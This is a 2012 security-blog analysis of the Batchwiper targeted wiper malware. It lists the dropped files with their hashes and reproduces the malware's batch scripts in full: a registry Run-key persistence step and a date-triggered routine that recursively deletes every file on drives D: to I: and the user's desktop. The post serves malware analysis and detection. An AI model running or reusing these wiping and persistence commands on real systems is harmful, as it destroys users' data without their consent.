Batchwiper: Just Another Wiping Malware

December 17, 2012 | Jaime Blasco

Get the latest security news in your inbox.

Subscribe via Email

No thanks. Close this now.

A few days ago, The Iranian CERT (Maher Center) released information about a new identified targeted malware with wiping capabilities. The piece of code is very simple and it deletes files on different drives on specific dates.

The original dropper is a self-extracting RAR file with the name GrooveMonitor.exe. Once executed it extracts the following files:

\WINDOWS\system32\SLEEP.EXE, md5: ea7ed6b50a9f7b31caeea372a327bd37

\WINDOWS\system32\jucheck.exe, md5: c4cd216112cbc5b8c046934843c579f6

\WINDOWS\system32\juboot.exe, md5: fa0b300e671f73b3b0f7f415ccbe9d41

The juboot.exe is executed. The following bat file is created and executed:

\Documents and Settings\%User%\Local Settings\Temp\1.tmp\juboot.bat

@echo off & setlocal

sleep for 2

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d “%systemroot%\system32\jucheck.exe” /f

start “” /D”%systemroot%\system32\” “jucheck.exe”

As you can see the bat file uses reg.exe to create a registry key that the malware uses to maintain persistence executing the jucheck.exe file everytime the system boots.

Then jucheck.exe is executed that creates the file \Documents and Settings\Administrator\Local Settings\Temp\4.tmp\jucheck.bat:

@echo off & setlocal

sleep for 2

del “%systemroot%\system32\juboot.exe” /q /s /f

del “%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe” /q /s /f

if “%date%”==“Mon 12/10/2012” goto yes

if “%date%”==“Tue 12/11/2012” goto yes

if “%date%”==“Wed 12/12/2012” goto yes

if “%date%”==“Mon 01/21/2013” goto yes

if “%date%”==“Tue 01/22/2013” goto yes

if “%date%”==“Wed 01/23/2013” goto yes

if “%date%”==“Mon 05/06/2013” goto yes

if “%date%”==“Tue 05/07/2013” goto yes

if “%date%”==“Wed 05/08/2013” goto yes

if “%date%”==“Mon 07/22/2013” goto yes

if “%date%”==“Tue 07/23/2013” goto yes

if “%date%”==“Wed 07/24/2013” goto yes

if “%date%”==“Mon 11/11/2013” goto yes

if “%date%”==“Tue 11/12/2013” goto yes

if “%date%”==“Wed 11/13/2013” goto yes

if “%date%”==“Mon 02/03/2014” goto yes

if “%date%”==“Tue 02/04/2014” goto yes

if “%date%”==“Wed 02/05/2014” goto yes

if “%date%”==“Mon 05/05/2014” goto yes

if “%date%”==“Tue 05/06/2014” goto yes

if “%date%”==“Wed 05/07/2014” goto yes

if “%date%”==“Mon 08/11/2014” goto yes

if “%date%”==“Tue 08/12/2014” goto yes

if “%date%”==“Wed 08/13/2014” goto yes

if “%date%”==“Mon 02/02/2015” goto yes

if “%date%”==“Tue 02/03/2015” goto yes

if “%date%”==“Wed 02/04/2015” goto yes

goto no


sleep for 3000

IF EXIST d:\ del “d:\*.*” /q /s /f

IF EXIST d:\ Chkdsk d:

IF EXIST e:\ del “e:\*.*” /q /s /f

IF EXIST e:\ Chkdsk e:

IF EXIST f:\ del “f:\*.*” /q /s /f

IF EXIST f:\ Chkdsk f:

IF EXIST g:\ del “g:\*.*” /q /s /f

IF EXIST g:\ Chkdsk g:

IF EXIST h:\ del “h:\*.*” /q /s /f

IF EXIST h:\ Chkdsk h:

IF EXIST i:\ del “i:\*.*” /q /s /f

IF EXIST i:\ Chkdsk i:

del “%userprofile%\Desktop\*.*” /q /s /f

\\start calc


As you can see when the bat file is executed, the juboot.exe file is deleted as well as the GrooveMonitor.exe executable that resides in the Start Menu folder. Then the bat files checks the system date and if it matches one of the predefined dates  it executes the wiping routine. This routine checks for system drives and it then deletes every file on those drives. Finally it deletes the userprofile folder.

We don’t have details about the infection vector but based on the dropper it could be deployed using USB drives, internal actors, SpearPhishing or probably as the second stage of a targeted intrusion.

We have built some OpenIOC indicators that you can access here.


Jaime Blasco

About the Author: Jaime Blasco
Jaime Blasco is a renowned Security Researcher with broad experience in network security, malware analysis and incident response. At AlienVault, Jaime leads the Lab Intelligence and Research team that leads the charge of researching and integrating threat intelligence into detection mechanisms. Prior to working at AlienVault he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. He is based in San Francisco. Jaime's work in emerging threats and targeted attacks is frequently cited in international publications such as New York Times, BBC, Washington Post and Al Jazeera.
Read more posts from Jaime Blasco ›

TAGS: wiper, maher, iran


Watch a Demo ›